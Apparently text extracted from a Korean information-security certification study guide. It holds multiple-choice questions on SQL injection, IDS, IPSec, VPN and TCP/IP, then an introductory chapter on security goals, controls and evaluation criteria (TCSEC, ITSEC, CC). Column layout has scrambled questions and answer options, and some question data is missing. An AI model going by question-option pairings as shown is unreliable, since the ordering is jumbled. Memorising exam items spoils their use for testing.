추적할 수 있다. 다음 중 ( ) 에 들어갈 메일 헤더의 항목으로 올바른 것은? 339. 최근 웹 프로그래밍은 자료의 효율적인 저장 및 검색을 위해 DBMS를 필수적으로 사용하고 있다. 주로 PHP, JSP, ASP 등의 스크립트 언어를 이용하여 DBMS 와 연동하는데, 이러한 웹 어플리케이션에서 클라이언 트의 잘못된 입력 값을 검증하지 않으면 비정상적인 SQL query가 발생 할 수 있는데 이러한 특정을 이용 한 해킹 방법을 무엇이라 하는가? 1 SSI(Server Side Scripting) 2 SQL injection 3 WebDAV 서비스 거부 4 XSS(Cross Site Scripting) 1 Received 2 Message-ID 3 From 4 Content-Type 174
175 340. 클라이언트가 Apache 웹 서버에 접속할 때 웹 서버는 웹 서버 버전, 설치된 응용프로그램 등과 같은 정보를 클라이언트측에 전달한다. 이 정보는 공격자에 의해 Apache 웹 서버의 버전과 취약점을 찾아내는데 유용한 정보를 제공하므로 이러한 배너(banner) 정보 를 숨기는 것이 안전한데 ServerTokens 지시자를 수정 함으로써 가능 하다. 다음 중 가장 안전한 배너 설정은 무엇인가? 344. 네트워크 환경에서 스니핑에 대한 대책으로 데 이터 암호화가 제안되고 있다. 다음 중 데이터 암호화 를 위한 도구 또는 기법이 아닌 것은? 1 SSL(Secure Socket Layer) 2 AH(Authentication Header) 3 SSH(Secure Shell) 4 S-HTTP(Secure-HTTP) 1 Full 3 Prod[uctOnly] 2 Min[imal] 4 OS 345. 다음 그림과 같은 침입 탐기 기법은? 341. 다음 중 분산서비스거부공격(DDoS)에 대한 대책 으로 적합하지 않은 것은 무엇인가? 1 telnet, ftp, RPC 서비스 등은 외부에서의 사용을 제 한한다. 2 경계 라우터에서 불필요한 ICMP, UDP 트래픽을 제 한한다. 3 내부 IP 주소를 가지고 외부에서 들어오는 트래픽 을 제한한다. 4 웹 서비스를 제공하는 80번 포트는 해킹에 주로 사 용되므로 임의의 추측하기 힘든 포트로 변경한다 다음 중 보안에 사용하기에 가장 적합한 프로토콜로 짝지어진 것은 무엇인가? 1 PGP and S/MIME 2 IPSEC and IKE 3 TLS and SSL 4 SSH 343. 다른 많은 서비스와는 달리 텔넷은 꼭 필요한 서 비스 가운데 한 가지이다. 하지만 텔넷 프로그램에서 계속적인 버그 수정이 있었다하더라도 보다 심각한 단 점을 가지고 있기 때문에 보안 쉘을 사용하도록 권장 하고 있다. 이에 대한 이유로 적절치 못한 것은? 1 텔넷은 강력한 사용자 인증 방법을 사용하지 않고 세션 무결성 검사를 하지 않는다. 2 공격자들은 텔넷 프로그램을 core dump 시킨 후 덤프 된 내용을 통해 쉐도우(shadow) 패스워드를 볼 수 있다. 3 패스워드는 암호화되어 있지 않아 스니퍼(sniffer)를 이용하여 패스워드를 획득할 수 있다. 4 텔넷 세션은 암호화되어 있지 않다. 1 패턴매칭(Pattern Match) 2 키스트로크 관찰(Keystroke Monitoring) 3 신경망(Neural Network) 4 전문가 시스템(Expert System) 346. Anomaly Detection 의 특징으로 틀린 것은? 1 해커가 침입 탐지시스템을 피하기가 어렵다 2 알려지지 않은 해킹도 발견이 가능하다 3 오탐률이 적다 4 구현이 어렵다 347. 비정상적인 침입 탐지기법의 종류로 틀린 것은? 1 전문가시스템(Expert System) 2 신경망(Neural Network) 3 특징추출(Feature Selection) 4 예측 가능한 패턴 생성(Predictive Pattern Generation) 175
176 348. 침입탐지시스템 모델에 대한 다음 설명 중 틀린 것은? 1 단일 호스트 기반(Host Based Intrusion Detection) - 단일 호스트로부터 생성되고 수집된 감사(Audit) 데이터를 침입 여부 판정에 사용하며, 하나의 호스 트를 탐지영역으로 한다 2 다중 호스트 기반(Multi-Host Based Intrusion Detection) - 비정상적인 행위나 컴퓨터자원의 사 용을 탐지한다 3 행위측정 방식들의 결합(Anomaly Messures) - 여 러 비정상적인 행위 측정방법들을 사용하여 각각 의 결과를 통합하여 특정행위가 정상인지 비정상 인지를 측정하는 방법 4 오용침입 탐지기법(Misuse Detection) - 시스템과 응용프로그램의 취약점을 이용한 공격을 탐지한다 349. 침입차단시스템에 대해 IDS의 구축위치에 대한 설명으로 올바르지 못한 것은? 351. 다음 침입탐지 모델 기반의 분류에 해당하는 것 은? - 통계적인 방법과 같이 자료의 특성에 의존할 필요가 없다. - 노이즈가 많은 데이터에 잘 탐지할 수 있다. - 출력에 영향을 줄 수 있는 다양한 방법들 사이의 상관관계를 잘 나타낸다. 1 조건부 확률(Conditional Probability) 2 오용침입 탐지기법(Misuse Detection) 3 전문가 시스템(Expert System) 4 신경망(Neural Network) 352. 네트워크 기반(Network Based Intrusion Detection)의 단점으로 틀린 것은? 1 네트워크가 암호화 되어 있으면 감사 자료를 얻기 가 힘들다 2 해커가 피하기가 비교적 쉽다 3 침입에 적극적으로 대응하기가 쉽다 4 개발하기가 어렵고 구현방법도 힘들다 353. IDS의 분류 방법으로 적당하지 못한 것은? 1 IDS-1 : 방화벽에 대한 공격을 탐지 할 수 있어 좋 은 위치이다 2 IDS-2 : 방화벽이 충분한 정보를 전달해줘서 좋은 위치이다 3 IDS-3 : 방화벽을 통과한 공격을 탐지 할 수 있어 서 좋은 위치이다 4 IDS-4 : 내부 침입자에 대해 탐지 할 수 있어서 좋 은 위치이다 350. 단일 호스트로부터 생성되고 수집된 감사(Audit) 데이터를 침입 여부 판정에 사용하며, 하나의 호스트 를 탐지영역으로 하는 것은? 1 다중 호스트 기반(Multi-Host Based Intrusion Detection) 2 비정상적인 침입 탐지 기법(Anomaly Detection) 3 웹 기반(Web Based Intrusion Detection) 4 단일 호스트 기반(Host Based Intrusion Detection) 1 침입탐지모델은 비정상적 침입탐지, 오용탐지, 하이 브리드 탐지로 나뉜다 2 IDS는 침입탐지모델 기반과 데이터 소스 기반으로 나뉜다 3 다중 호스트 기반은 간접호스트기반과 직접호스트 기반으로 나뉜다 4 데이터소스기반에서는 단일 호스트기반, 다중 호스 트기반, 네트워크 기반으로 나뉜다 354. 침입 탐지에 대한 문제점으로 틀린 것은? 1 세션을 이용한 공격(Session Attacks) 2 정보수집 기술(Data Collection) 3 문맥을 이용한 공격(Contextual Attacks) 4 협조체제의 공격(Cooperative Attacks) 355. 인터넷 상에서 보안 메커니즘을 위한 기술로 트 래픽 제어와 인증 및 암호화를 제공하기 위한 안전한 트래픽 서비스를 하는 프로토콜은 무엇인가? 1 ARP 3 IPv6 2 IPSec 4 ICMP 176
177 356. IPSec이 제공하는 보안 서비스가 아닌 것은? 1 접근 통제 2 데이터 근원 인증 3 재연공격방지 4 패킷필터링 362. IP 보안에서 패킷 레벨에서의 보안을 제공하기 위한 메커니즘은 무엇인가? 1 IPv6 2 L2TP 3 ARP 4 IPSec 357. IPSec에서 제공되는 프로토콜과 동작 모드에 대 한 설명이다. 틀린 것은? 1 비연결형 무결성과 데이터 근원 인증을 제공하기 위해 AH를 사용한다 2 AH는 단독 사용이 안되며 상위계층 프로토콜에 대 한 보호 제공을 위해 ESP 프로토콜과 결합되어 사 용된다 3 상호인증, 메시지 인증코드, 암호화 등의 보안서비 스를 제공하기 위하여 클라이언트와 서버는 필요 할때마다 새로운 핸드쉐이크를 요구할 수 있다 4 터널화된 IP패킷들에 적용되는 터널 모드를 지원한 다 358. 인터넷과 같은 공중망(Public network)을 사용하 여 논리적으로 독립된 네트워크 자원을 사용하며 일부 사용자만을 위한 보안 서비스를 제공해주는 기술은? 1 IPSec 2 VPN 3 IPv6 4 ATM 359. 가상사설망이 제공하는 보안 서비스가 아닌 것은 무엇인가? 1\ 1 패킷 필터링 2 접근 제어 3 데이터 무결성 4 데이터 암호화 360. 가상사설망(VPN)의 관련 기술이 아닌 것은? 1 IPv6 2 PPP 3 L2TP 4 IPSec 361. 시스코에서 제안한 기술로서 클라이언트에 특별 한 소프트웨어를 요구하지 않으며 하부구조에서 이를 지원하는 프로토콜로서 하나의 터널에서 여러 개의 연 결을 지원할 수 있는 가상사설망 기술은? 1 PPTP 2 IPv6 3 L2TP 4 PPP 363. ESP의 패킷 형식 필드에 해당 하지 않는 것은? 1 SPI(Security Parameters Index) : 임의의 32비트 값 으로 목적지 IP주소와 ESP와 같은 보안 프로토콜과 함께 이 데이터그램에 대한 SA를 식별하게 해준다 2 인증 데이터(Authentication Data) : ESP 패킷에 대 해서 계산되는 기밀성 값을 가지는 고정 필드이다 3 일련번호(Sequence Number) : 일련번호는 부호 없 는 32비트 필드는 일정하게 증가하는 카운터 값을 포함하며 반드시 이 필드를 전송해야 한다 4 페이로드 데이터(Payload Date) : 페이로드 데이터 는 Next Header 데이터 필드에 의해 기술되는 데 이터를 포함하는 가변 필드이다 364. IPSec에서 비연결형 무결성과 데이터의 근원 인 증을 제공하기 위해 사용되는 것은 무엇인가? 1 ESP 2 Tunnelling 3 PPP 4 AH 365. VPN의 서비스명과 구조를 잘못 선택한 것은? 1 접근 가설 사설망 Client-initiated 구조 2 인트라넷 가상 사설망 NAS-initiated 구조 3 인트라넷 가상 사설망 IP tunnel 구조 4 익스트라넷 가상 사설망 IP tunnel 구조 366. IPSec의 ESP에서 Inbound 패킷 처리 과정이 올 바르게 된 것을 고르시오. 1 조합 - SA Lookup - SN 검증 - 패킷 복호화 - ICV 검증 2 조합 - SA Lookup - SN 검증 - ICV 검증 - 패킷 복호화 3 SA Lookup - 조합 - SN 검증 - ICV 검증 - 패킷 복호화 4 SA Lookup - 조합 - SN 검증 - 패킷 복호화 - ICV 검증 177
178 367. "arpwatch" 도구의 기능은? 1 원격 네트워크를 감시하고 MAC주소 DB를 구축 2 패스워드 정책을 강제하고 검사함 3 LAN을 감시하고 MAC주소 DB를 구축함 4 메모리로부터 복호화 된 NTLM 패스워드 해시 값 을 구함 368. 보안 관점에서, 다음 중 기존의 웹 사이트에 데이 터를 올리기 위한 가장 중요한 선결 사항은 무엇인가? 1 데이터 분류 수행 2 데이터 완전성 검증 3 데이터 소유주에게 데이터 업로드 권한 부여 4 시스템 보안 강화 절차 수행 374. TCP/IP의 네트워크 계층에 구현된 프로토콜이 아 닌 것은? 1 TCP 2 IP 3 IGMP 4 ICMP 375. 침입탐지/차단 시스템에 관련된 기술 중에서 데 이터를 분석하기 전에 적용하는 기술은? 1 데이터 스크러빙(Data scrubbing) 2 패킷 프레그멘테이션(Packet fragmentation) 3 데이터 노말라이제이션(Data normalization) 4 프래임 버퍼링(Frame buffering) 376. /24 서브넷에서, x.x.x.255는 무엇을 표현하는가? 369. 호스트 기반 IDS의 가장 큰 장점으로 볼 수 있는 것은? 1 미사용 주소 3 브로드캐스팅 주소 2 표준 주소 4 네트워크 주소 1 내부 공격의 식별 2 호스트상의 센서 성능 3 구축 및 관리의 용이함 4 Syslog 파일 포맷지원 377. 다음 중 비연결지향 전송 계층 프로토콜은? 1 UDP 2 TCP 3 ICMP 4 SMTP 370. 다음 중 사설 네트워크 주소가 아닌 것은? UDP 포트 111번은 다음 중 어떤 서비스에 자주 사용되는가? 371. 다음 중 TCP 패킷의 플래그 중에서 연결이 정상 적으로 끝남을 의미하는 것은? 1 DNS 3 RPC 2 SSH 4 SSL 1 FIN 3 ACK 372. 문제/해설 없음. 2 URG 4 RST 379. 다음 중 라우팅 될 수 없는 IP 주소는? TCP 헤더의 첫 번째 필드는 무엇인가? 373. 프록시 방화벽으로 연결된 두 호스트 간에는 몇 개의 연결이 존재하는가? 1 시퀀스 번호 3 메시지 길이 2 소스 포트 4 식별자 1 기술적으로 볼 때, 한 개도 없다. 2 한 개 3 두 개 4 세 개 381. traceroute는 명령어는 라우팅 경로를 알아내기 위하여 IP 헤더의 어떤 필드를 사용하는가? 1 RR 2 TOS 3 TTL 4 SSR 178
179 382. 시스템 상태의 지속적인 감시 및 실시간 경보는 어떤 종류의 감시인가? 1 호스트 기반 IDS 2 상태 기반 IDS 3 레지스트리 기반 IDS 4 네트워크 IDS 383. 다음 중 인프라 네트워크 아키텍처에서 엑세스 포인트(AP)의 목적은? 1 AP는 네트워크 동기화를 수행한다 2 AP는 압축을 수행한다 3 AP는 클라이언트를 상호 연결하는 브릿지 역할을 수행한다. 4 AP는 클라이언트를상호 연결하는 라우터 역할을 수행한다 다음 중 방화벽을 사용하는 이유로 적절치 않은 것은? 1 알려진 취약점들에 의한 위험을 완화한다 2 해당 사이트에 대한 정보 수집을 어렵게 한다 3 기업 보안 정책을 강제할 수 있다 4 현존하는 완벽한 보안 솔루션이다 385. NAT(Network Address Translation)을 사용하는 이유로 적절하지 않은 것은? 1 IP 주소공간을 확장하기 위하여 2 내부 IP 주소 체계를 외부에 숨길 수 있으므로 3 사설 IP 주소의 사용이 가능하므로 4 공인 IP 주소가 안전해지므로 388. 모바일 장치에 전원을 켰을 경우, 해당 장치가 어 떤 네트워크에 접속할 지를 판별하는 방법은? 1 장치에 설정된 네트워크 2 지리적으로 가까운 네트워크 3 가장 강력한 신호를 주는 네트워크 4 주파수가 일치하는 네트워크 389. 다음 중 신호가 고체를 통과하지 못하는 성질을 이용하여 높은 수준의 보안이 요구되는 환경에서 사용 되는 무선 네트워크는? 1 극초단파(microwave) 2 위성(satellite) 3 주파수 4 적외선 390. 다음 중 케이블 설치시의 중대한 보안 위협은? I. 외부자에 의한 접근 II. 전기 차단 III. 노출된 허브 또는 스위치 IV. 방수 V. 접근 가능한 네트워크 잭 1 II, III, 및 IV 2 II, IV, 및 V 3 I, III, 및 V 4 I, II, 및 III 391. 대부분의 조직에서 대다수의 공격을 막을 때 사 용하는 보안 수단은? 1 침입탐지시스템 2 변경 관리 3 안티바이러스 소프트웨어 4 방화벽 386. Cisco의 점근통제목록(ACL)은 다음 중 어떤 것을 필터링 할 수 있는가? I. 프로토콜 II. 소스 및 목적지 IP 주소 III. 어플리케이션 데이터 IV. 포트 V. 세션 정보 392. 바이러스는 다음 중 어떠한 경로로 전파되는가? 1 이메일 2 네트워크를 통해서 3 파일전송 및 다운로드 4 파일 공유 5 위의 모든 경로 1 II, IV, 및 V 3 I, II, 및 IV 2 I, III, 및 IV 4 III, IV, 및 V 387. 문제/해설 없음. 179
180 393. 가장 대중적인 스캐닝 프로그램인 nmap은 많은 스캔 옵션을 제공한다. 이 중 아래는 TCP SYN 스캔에 대한 설명인데, ( ) 에 공통적으로 들어가는 용어는 무 엇인가? "SYN 스캔은 Full TCP 접속을 하지 않으므로 'half-open' 스캐닝이라 한다. 하나의 SYN 패킷을 보 내어 SYN ACK 응답이 오면 그 포트는 리슨하고 있는 상태이고, ( )응답이 오면 리슨하지 않는 것을 나타낸 다. 이 기술은 하나의 패킷을 보내어 SYN ACK 응답을 받 으면 그 즉시 ( )패킷을 보내서 접속을 끊어버린다. 1 SYN 2 ACK 3 RST 4 FIN 5 PSH 394. 다음은 어떤 공격에 대한 패킷로그를 검출할 것 을 보여주고 있다. 어떠한 공격인가? Source: Destination: Protocol: 6 Src Port: DST Port: Land Attack 2 Syn flooding Attack 3 Smurf Attack 4 Ping of death Attack 5 UDP Flood Attack 396. 다음의 TCPdump 출력에서 윈도우 사이즈는? kisa.co.kr.telnet > client.com.38060: P 1:14(13) ack 1 win 많은 보안 회사들이 다양한 보안 솔루션과 서비 스를 제공하고 있다. 이 중에서 보안을 달성하는 방법 으로 가장 좋은 것은? 1 방화벽 + 가상 사설망 2 방화벽 + 침입탐지 시스템 3 서버 보안 + 침입방지시스템 4 조직 특성에 맞는 보안 시스템의 설치 및 정보보안 관리 및 절차 수립 TCP 3-way 핸드세이킹의 최초 단계에서 사용되 는 TCP 패킷은? 1 SYN 패킷 2 ACK 패킷 3 UDP 패킷 4 Null 패킷 399. 하드웨어 어드레스는 몇 개의 비트로 정의되나? 1 6비트 2 16비트 3 24비트 4 46비트 5 48비트 395. 다음 글의 ( )에 들어갈 용어로 적절한 것은? ( ) 은 해커를 취약성을 가진 서버에 침입하도록 유도 한 뒤 해킹 수법이나 해킹 경로 등을 관찰함으로써 해커의 기술수준과 공격 의도를 파악할 수 있도록 하 는 보안 기술로서 해커 몰래 실시간 모니터링 및 침 입 기록 등을 감시하 는 능동적인 보안 기술로, 추적 자나 시스템 관리자들은 이를 이용해 분석된 자료를 기반으로 해커가 어떠한 과정을 통해 해당 서버로 접 근했으며 어떠한 취약점을 공격했는지 알아낼 수 있 다 네트워크 인터페이스 카드(NIC)를 promiscuous mode로 설정하는 이유는 무엇인가? 1 모든 유입 트래픽을 차단함으로써 시스템 보안을 강화하기 위하여 2 네트워크를 지나는 모든 패킷을 읽기 위해 3 해당 호스트가 다른 호스트와의 통신을 원활하게 할 수 있도록 구성하기 위하여 4 해당 NIC으로 들어오는 모든 패킷들을 해당 네트 워크 세그먼트로 재전송하기 위함 1 싱글 사인 온 3 EAM 5 침입방지시스템 2 ESM 4 허니팟 401. 데이터 전송을 여러 개의 작은 단위의 데이터로 나누었을 때 가장 적절한 용어는? 1 패킷 2 프로토콜 3 스택 4 계층 180
181 402. 헤더에 포함되어 있지 않은 것은? 1 데이터의 소스(출발지) 2 데이터의 목적지 3 패이로드에 저장된 데이터의 타입 4 사용될 어플리케이션의 버전 403. 다음 중 침입방지시스템 (IPS)에 대한 설명으로 적합한 것은? 1 유지보수비가 저렴한 도구이다. 2 방화벽을 대체한다. 3 모든 공격을 막지는 못한다. 4 가격이 저렴하다 다음 중 다단계방어 (Defense-in-Depth)의 원칙에 대해 가장 잘 설명하고 있는 것은? 1 네트워크를 섹션별로 분리한다 2 하나의 보안 수단에 의존하지 않는다. 3 트래픽이 방화벽을 통과하는 것을 제한한다. 4 방화벽과 연동되는 장비를 사용한다 네트워크 주소는 어는 클래스에 속하는가? 1 클래스 A (처음과 두 번째 비트 00) 2 클래스 B (처음과 두 번째 비트 10) 3 클래스 C (처음과 두 번째 비트 11) 4 클래스 D (처음과 두 번째 세 번째 비트 111) 404. 네트워크 침입방지 시스템(NIPS)에서 합법적인 트 래픽이 통과하지 못했을 때, 그러한 현상을 무엇이라 고 하는가? 1 True Negatives 2 False Negatives 3 True Positives 4 False positives 409. TCPdump의 option중에서 모든 세그먼트의 절대 일련번호를 표시하기 위한 옵션은 무엇인가? 1 -s 2 -w 3 -S 4 -r 405. 네트워크 상에서 공격을 탐지할 때, IDS벤더들이 자신의 제품의 취약성을 드러내지 않기 위해 어떤 종 류의 침입탐지시스템 경보를 매우 드물게 발생시키는 가? 1 True Positives 2 True Negatives 3 False negatives 4 False Positives 406. 다음 중 TCPdump TCP 옵션 Output 중에서 윈 도우 사이즈는 무엇을 나타내는가? 1 유입 버퍼 사이즈 2 바이트 사이즈 3 초기일련 번호 4 종단 일련 번호 181
182 제 3장. 정보보호 개론 제 1절. 정보보호 개념 chapter 1. 정보보호 개요 chapter 2. 정보보호 목표 chapter 3. 정보보호 위협 및 대책 chapter 4. 정보보호 시스템 평가 기준 및 제도 제 2절. 정보보호 관리 chapter 1. 정보보호관리 개요 chapter 2. 정보보호관리 과정 chapter 3. 정보보호관리 체계 제 3절. 정보보호 법률 및 윤리 chapter 1. 정보보호 법률 chapter 2. 정보보호 윤리 제 4절. 정보보호 개론 문제 풀이 chapter 1. 종합 문제 182
183 제 1절. 정보보호 개념 chapter 1. 정보보호 개요 가. 정보보호의 필요성 산업사회에서 정보화사회로 바뀌면서 오프라인에서 수행되던 일이 대부분 온라인으로 수행 가능해 지 고 있다. 언제 어디에서든 온라인으로 자신에게 필요한 다양한 종류의 정보를 검색, 접근 그리고 활용 가능하면서 업무의 효율성과 함께 삶의 질이 높아졌다. 하지만 정보화의 순기능과 함께 개인정보가 노출, 악용되는 등의 사례가 증가함에 따라 사생활이 침해 되거나, 조직 내 중요 정보가 오용과 악의적인 의도에 의해 유출되는 등의 치명적인 정보화의 역기능 이 발생하게 되었다. 정보화 역기능의 사례는 지속적으로 증가하고 있으며 사용되고 있는 기술도 정보기술과 함께 발달하고 있으므로, 정보보호의 필요성이 더욱 중요시되고 있다. 나. 정보보호의 정의 정보보호(Information Security)란 의도되었건 의도되지 않았건 간에, 인가받지 않은 노출, 전송, 수정 그리고 파괴로부터 정보를 보호하는 것을 말하는 것으로, 정보화촉진기본법 제2조에서는 정보의 수집 가공 저장 검색 송신 수신 중에 정보의 훼손 변조 유출 등을 방지하기 위한 관리적 기술적 수 단을 강구하는 것을 말하고 있다. chapter 2. 정보보호 목표 o 기밀성(Confidentiality) - 정보가 허가되지 않은 사용자(조직)에게 노출되지 않는 것을 보장하는 보안 원칙 o 무결성(Integrity) - 정보가 권한이 없는 사용자(조직)의 악의적 또는 비악의적인 접근에 의해 변경되지 않는 것을 보장하는 보안 원칙 o 가용성(Availability) - 인가된 사용자(조직)가 정보시스템의 데이터 또는 자원을 필요로 할 때 부당한 지체 없이 원하는 객체 또는 자원을 접근하고 사용할 수 있는 것을 보장하는 보안 원칙 183
184 chapter 3. 정보보호 위협 및 대책 다음 [표 1-1]은 정보보호의 목표 사항을 위협하는 공격 유형에 대한 설명이다. 이러한 위협에 대한 정보보호 대책으로 크게 예방 통제(Preventive Controls), 탐지 통제(Detective Controls) 그리고 교정 통제(Corrective Controls)가 있다. o 예방 통제(Preventive Controls) - 예방 통제란 오류(errors)나 부정(irregularity)이 발생하는 것을 예방할 목적으로 행사하는 통제를 말하는 것으로, 발생 가능한 잠재적인 문제들을 식별하여 사전에 대처하는 능동적인 개념의 통제이 다. 사실상 문제가 발생한 뒤에 이를 찾아내고 뒷수습하려고 하는 것보다는 사전에 예방하는 것이 더욱 경제적이다 - 예를 들어 자산에 대한 통제방법은 물리적 접근 통제와 논리적 접근 통제가 있다. 물리적 접근통제 는 관계자 이외의 사람이 특정 시설이나 설비에 접근할 수 없게 하는 각종의 통제를 의미하며, 논리적 접근통제는 승인 받지 못한 사람이 정보통신망을 통하여 자산에 대한 접근을 막기 위한 통제 를 의미한다. - 또한 중요한 기업 정보를 다루는 직원들에 대한 신상 조회와 업무의 철저한 분장을 통해 두 명 이상 이 공모하지 않는 한 부정을 저지르지 못하게 하는 것도 예방 통제에 속한다. 184
185 o 탐지 통제(Detective Controls) - 발생 가능한 모든 유형의 오류나 누락(omission) 또는 악의적 행위를 예측하고 이에 대한 예방책을 마련한다 하더라도, 예방 통제로만 완전히 막을 수는 없다. 그러므로 예방 통제를 우회하여 발생한 문제들을 찾아내기 위한 통제가 필요하다. - 예를 들어, 접근통제 보안 소프트웨어는 예방 통제의 기능과 함께 불법적으로 시도한 모든 접근들에 대한 기록을 가지고 있는데 이를 접근 위반 로그(Access Violation Log)이라고 한다. 일반적인 로그 파일들은 이러한 적발을 목적으로 사용된다. 이외에도 메시지가 정확히 전송되었는지를 판단하기 위 한 에코 체크(echo check)도 탐지 통제에 해당한다. o 교정 통제(Corrective Controls) - 탐지 통제를 통해 발견된 문제들을 해결하기 위해서는 별도의 조치가 필요하다. 문제의 발생 원인과 영향을 분석하고 이를 교정하기 위한 조치가 취해져야 하며, 문제의 향후 발생을 최소화하기 위하여 시스템을 변경해야 할지도 모른다. 이러한 일련의 활동을 교정 통제라고 한다. - 예를 들어, 예기치 못하였던 시스템 중단이 발생할 경우 어떻게 재실행해야 하는지를 규정한 절차, 백업과 복구를 위한 절차 그리고 비상상태에 대한 대처 계획도 교정 통제이다. - 특히 불법적인 접근 시도를 발견해내기 위한 접근 위반 로그는 탐지 통제에 속하지만, 데이터 파일 의 복구를 위해 사용되는 트랜잭션 로그(Transaction Log)는 교정 통제에 속한다. chapter 4. 정보보호 시스템 평가 기준 및 제도 가. TCSEC 미국은 국방부, NBS(National Bureau of Standards, NIST의 전신) 및 MITRE 등을 중심으로 안전한 컴 퓨터시스템의 구축과 평가 등에 관한 지속적인 연구 결과로 1983년에 소위 Orange Book 으로 불리는 안전한 컴퓨터시스템 평가기준인 TCSEC(Trusted Computer System Evaluation Criteria) 초안을 제정하 였다. TCSEC은 1985년에 미 국방부 표준(DoD STD)으로 채택되었다. 미 국방부는 안전 신뢰성이 입증된 컴퓨터시스템을 국방부 및 정부기관에 보급하기 위하여 TCSEC을 7 가지 등급(D1, C1, C2, B1, B2, B3, A1)으로 분류하여 각 기관별 특성에 맞는 컴퓨터시스템을 도입 운영 하도록 권고하고 있다. TCSEC은 보안정책, 표시, 신분확인, 감사기록, 보증 그리고 컴퓨터를 지속적으로 보호하기 위한 보안 기본 요구사항으로 제시하고 하고 있다.TCSEC은 컴퓨터시스템이 제공해야 하는 기능을 보안정책, 보안 정책을 지원하는 책임추적성(Accountability), 보증 그리고 문서부분으로 나누어서 각 등급별 요구사항 을 정의해 놓고 있다. 185
186 186
187 (그림 1-1) 각 등급별 중요 요구사항 및 특성 187
188 다음 [표 1-3]은 TCSEC 평가 등급에 대한 설명이다. 나. ITSEC ITSEC은 영국, 독일, 프랑스 및 네덜란드 등 자국의 정보보호시스템 평가기준을 제정하여 시행하던 4개 국이 평가제품의 상호 인정 및 평가기준이 상이함에 따른 정보보호 제품의 평가에 소요되는 시간, 인 력 및 소요 비용을 절감하기 위하여 1991년에 ITSEC v1.2를 제정하였다. ITSEC은 단일 기준으로 모든 정보보호제품을 평가하고, 평가 등급은 E1(최저), E2, E3, E4, E5 및 E6(최고)의 6등급으로 나누어진다. E0 등급은 부적합 판정을 의미한다. 188
189 다. CC(Common Criteria) : 국제 공통 평가 기준 정보보호시스템을 평가하기 위한 평가기준 개발 역사는 1983년 일명 "Orange book"으로 불리는 미국 의 국방성(DoD)표준인 TCSEC에서 찾을 수 있다. 1990년에는 영국, 독일, 프랑스 그리고 네덜란드 등 유럽 4개국의 ITSEC 버전 1.0이 개발되었고 1993년에 캐나다의 CTCPEC 버전 V3.0 이 개발되었다. 이러한 평가기준의 개발 노력은 정보보호시스템을 직접 평가하기 위한사전단계로서 그 의미를 가지고 있는 반면에 각국의 서로 다른 평가기준의 시행은 비용과 시간의 과다 소모 등의 문제점이 야기되었 다. 이를 타개하기 위한 노력의 일환으로 1993년 6월 선진 6개국을 중심으로 국제공통평가기준(CC) 개 발을 시작하여 1998년 5월에 CC 버전 2.0이 제정되었다. 이후 개정 작업이 계속되어 1999년 6월 8일 CC 버전 2.1이 ISO/IEC 국제표준으로 채택되었다. 이 과정에서 기존의 CC 버전 2.0의 체계가 서론 및 일반모델(Introduction and general model), 보안기능 요구사항(Security functional requirements), 보증요구사항(Security assurance requirements) 그리고 부록(Annexes) 등 네 파트에서 서론 및 일반모델(Introduction and general model), 보안기능 요구사항(Security functional requirements), 보안보증 요구사항(Security assurance requirements) 등 세 부분으로 변경되어 현재의 CC 버전 2.1로 모습을 바꾸었다. 내용상 CC 버전 2.1과 CC 버전 2.0의 차 이점은 거의 없으나, ISO/IEC 획득 과정에서 표준문서로의 수정이 가해져 국제표준으로 채택되 게 이르렀다. 이러한 개발과정을 통해 완성된 국제공통평가기준(CC) 버전 2.1은 2000년 5월 새롭게 출범한 CCRA 체제에서의 평가기준으로서 뿐만 아니라, 현재의 정보보호시스템 평가를 위한 국제기준으로서 역할을 담당하고 있다.공통평가기준의 등급체계를 이루는 요소는 ITSEC에서와 같은 보안보증 요구사항이다. 공통평가기준의 평가보증등급(EAL: Evaluation Assurance Level)은 보증을 얻기 위한 비용과 이를 통해 얻을 수 있는 보증 수준간의 균형을 이루는 단계적인 등급을 제공한다. 공통평가기준(CC)에서는 평가 종료 시의 TOE에 대한 보증과 TOE 운영 중에 유지되는 보증의 개념을 구분한다. 공통평가기준 평가보증등급은 7등급(EAL1, EAL2, EAL3, EAL4, EAL5, EAL6, EAL7)으로 구분되며 등급이 높아질수록 보안보증 요구사항이 강화된다. 공통평가기준은 TCSEC처럼 한 등급에 대하여 기능과 보안 보증 요구사항이 규정되어 있는 것이 아니라 기능은 다양한 기능에 필요한 요구사항을 분류하여 기준 으로 제시하고 있지만 이들은 부품처럼 필요한 기능만 선택하여 쓸 수 있도록 하고 가정된 위협에 대 처하기 위해 필요한 기능을 모아 놓은 정보보호제품을 평가보증등급(EAL)에 따라 평가한다. IT 보안 평가를 위한 CC는 ISO/IEC 15408: "Evaluation criteria for information technology security"에 표준 문서로 명시되어 있으며, 모든 정보보호시스템 유형을 포괄할 수 있는 보안 평가 기준을 제시하 고 있다. 현재 국내에서도 CC기준의 보안평가 기준을 마련하여 정보보호 제품을 평가하고 있다. 189
190 다음 [표 1-4]는 CC와 국가별로 구분된 정보보호시스템 평가 기준과의 관계이다. o CC(공통평가기준)의 활용 공통평가기준은 소비자, 개발자, 평가자의 세 가지 측면에서 활용 가능하며 각각의 구성 및 활용은 다음 [표 1-5]와 같다. 190
191 제 2절. 정보보호 관리 chapter1. 정보보호관리 개요 지금까지 대부분의 조직에서 정보보호를 위해서 침입차단, 침입탐지 또는 바이러스 방역 등의 개별적 인 보안 정책이 이루어졌으나 최근에는 통합적인 정보보호관리 분야의 중요성이 강조되면서 ESM (Enterprise Security Management)과 같은 통합 보안 관리시스템이 등장하고 있으며, 보안관리 컨설팅 산업에 대한 수요 증가와 함께 BS7799와 같은 정보 보호 관리 체계에 대한 중요성이 확대되고 있다. chapter2. 정보보호 관리과정 가. 정보보호 관리과정 정의 정보보호 관리체계 인증심사기준(정보통신망이용촉진및정보보호등에관한법률) 제 47조에 의거, 정보통 신부 고시)에서 정보보호 관리과정 이란 정보보호 관리체계를 수립 운영하기 위하여 유지 관리하여야 할 과정이라 정의하였다. 나. 정보보호관리과정 단계 정보보호 관리과정은 크게 '정보보호정책 수립','정보보호 관리체계 범위설정','위험관리', '구현' 그리고 ' 사후관리' 5 단계 활동으로 규정된다. 정보보호 관리과정은 정보보호정책 수립, 정보보호 관리체계 범 위설정, 위험관리, 구현, 그리고 사후관리의 각 단계별 관리과정의 인증을 위한 요구사항이 지정되어 있다. 191
